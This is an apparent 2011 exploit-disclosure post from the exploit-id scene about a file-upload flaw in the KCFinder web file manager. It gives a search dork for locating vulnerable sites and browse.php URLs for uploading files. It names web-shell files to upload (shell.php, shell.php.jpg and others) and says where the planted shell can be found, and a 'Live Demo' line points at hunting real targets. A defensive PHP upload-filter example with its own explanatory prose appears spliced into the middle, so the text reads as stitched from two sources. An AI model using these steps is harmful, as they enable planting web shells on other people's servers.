14 Jun 2011

CKSource KCFinder <= File Upload Vulnerability

=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/
   Exploit-ID is the Exploit Information Disclosure
 
Web             : exploit-id.com
e-mail          : root[at]exploit-id[dot]com             
 
                  #########################################
               I'm Z190T, member of Exploit-Id
      #########################################
======================================================================
 
[x] Title : "CKSource KCFinder <= File Upload Vulnerability"
[x] Author : Z190T
[x] Contact : mahruz.id[at]gmail[at]com
[x] Vendor : http://kcfinder.sunhater.com/
[x] Platform : PHP and asp
[x] dork : /kcfinder/browse.php
[x] Tested on : Windows XP sp3 Ar & Linux
 
**** Notice ****
KCFinder is an alternative to the CKFinder web file manager.
It can be integrated into the FCKeditor, CKEditor, and TinyMCE WYSIWYG web editors
to upload and manage images, Flash, and other files that can be embedded in an editor's generated HTML content.
 
**** Exploit Details ****
- http://[localhost]/kcfinder/browse.php
- http://[localhost]/[found-path]/kcfinder/browse.php
 
**** Attachment ****
- http://[localhost]/kcfinder/browse.php?type=files&dir=/ <== for anything Files
- http://[localhost]/kcfinder/browse.php?type=images&dir=/ <== for anything Images
- Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or [txt] extensions!!
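The names listed above show why an upload filter that only looks at the last extension is not enough. As an added defensive illustration (not KCFinder's own code; the function name and allow-list are assumptions), the check below treats every dot-separated component of an uploaded name as an extension, so shell.php.jpg is rejected along with shell.php, shell.asp and shell.html:

```php
<?php
// Added example, not part of KCFinder: strict extension allow-list for uploads.
// Every component after the base name is checked, so "shell.php.jpg"
// fails on "php" even though its final extension "jpg" is allowed.
function upload_name_is_allowed(string $name, array $allowed): bool
{
    // Drop any directory components smuggled into the name.
    $base = basename(str_replace('\\', '/', $name));
    if ($base === '' || $base[0] === '.') {
        return false;                 // empty or dot-file (e.g. .htaccess)
    }
    $parts = explode('.', $base);
    if (count($parts) < 2) {
        return false;                 // no extension at all
    }
    array_shift($parts);              // remove the base name itself
    foreach ($parts as $ext) {
        // Case-insensitive, strict comparison against the lowercase allow-list.
        if (!in_array(strtolower($ext), $allowed, true)) {
            return false;             // any disallowed component rejects the file
        }
    }
    return true;
}

// Only the types the editor actually needs to embed (assumed policy).
$allowedImages = ['jpg', 'jpeg', 'png', 'gif'];

// Constructed sample names, including those named in this advisory.
$samples = ['photo.jpg', 'shell.php', 'shell.asp', 'shell.html',
            'shell.php.jpg', 'shell.asp.jpg', 'notes.txt', '.htaccess'];
foreach ($samples as $s) {
    printf("%-15s %s\n", $s,
        upload_name_is_allowed($s, $allowedImages) ? 'accepted' : 'rejected');
}
```

A name check like this is only one layer: the upload endpoint still needs authentication, and the stored file should be served from a directory where the web server does not execute scripts.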
 
**** Preview ****
- You can see it there!! "0r"
- http://[localhost]/[found-path]/kcfinder/upload/files/[g0 a HACK]
 
**** Live Demo ****
- http://[still-searching]/js/kcfinder/browse.php
 
======================================================================
 
[ Thx TO ]
 
[x] All member of EXPLOIT-ID.com, ungu.com, THK-forumo.org, etc...
[x] friends I'm proud of : haX0r.x0x, Surabaya Getar, kaMtiEz, eXeSoul, Caddy-Dz, KedAns-Dz, metasploit, KnocKout, etc...
 
======================================================================